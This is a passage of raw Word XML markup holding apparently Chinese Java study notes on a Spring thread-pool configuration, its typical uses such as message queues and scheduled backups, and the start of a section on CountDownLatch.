          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="004F674F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6025" w:rsidRPr="004D6025" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"keepAliveSeconds"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="004F674F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>60L</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6025" w:rsidRPr="004D6025" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5327" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>task:annotation-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F674F" w:rsidRPr="004D6025" w:rsidRDefault="004F674F" w:rsidP="004D6025">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上传文件时候</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5327" w:rsidRPr="00A246D2" w:rsidRDefault="00A246D2" w:rsidP="00A97B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD5327" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00755673" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD5327" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>消息队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5327" w:rsidRDefault="00FD5327" w:rsidP="00A97B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B77B91" w:rsidRDefault="00A246D2" w:rsidP="00A97B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00B77B91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00B77B91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>orker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77B91" w:rsidRDefault="00B77B91" w:rsidP="00A97B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B33F2F" w:rsidRPr="00A246D2" w:rsidRDefault="00A246D2" w:rsidP="0067193B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="00B33F2F" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A246D2" w:rsidRDefault="00755673" w:rsidP="00A246D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>备份数据</w:t>
      </w:r>
      <w:r w:rsidR="002A101A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、导出报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A246D2" w:rsidRDefault="00A246D2" w:rsidP="00A246D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B074D9" w:rsidRPr="00A246D2" w:rsidRDefault="00A246D2" w:rsidP="00A246D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidR="00D17A03" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>页面静态化，</w:t>
      </w:r>
      <w:r w:rsidR="00B074D9" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>生成静态页面时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847DA0" w:rsidRPr="00847DA0" w:rsidRDefault="00847DA0" w:rsidP="00847DA0"/>
    <w:p w:rsidR="00E54DC3" w:rsidRPr="00F41A4C" w:rsidRDefault="00E54DC3" w:rsidP="00E54DC3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发包工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54239" w:rsidRPr="00F41A4C" w:rsidRDefault="00E54239" w:rsidP="00E54239">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CountDownLatch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54DC3" w:rsidRDefault="00E54239" w:rsidP="00E54239">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许一个或多个线程等待其他线程完成操作</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，调用</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>countDown</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法时，</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会减</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CountDownLatch</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法会阻塞当前线程，直到</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变成</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>countDown</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法可以用在任何方法，所以这里说的</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个点，可以是</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个线程，也可以是</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个线程的</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00ED6036">
        <w:rPr>
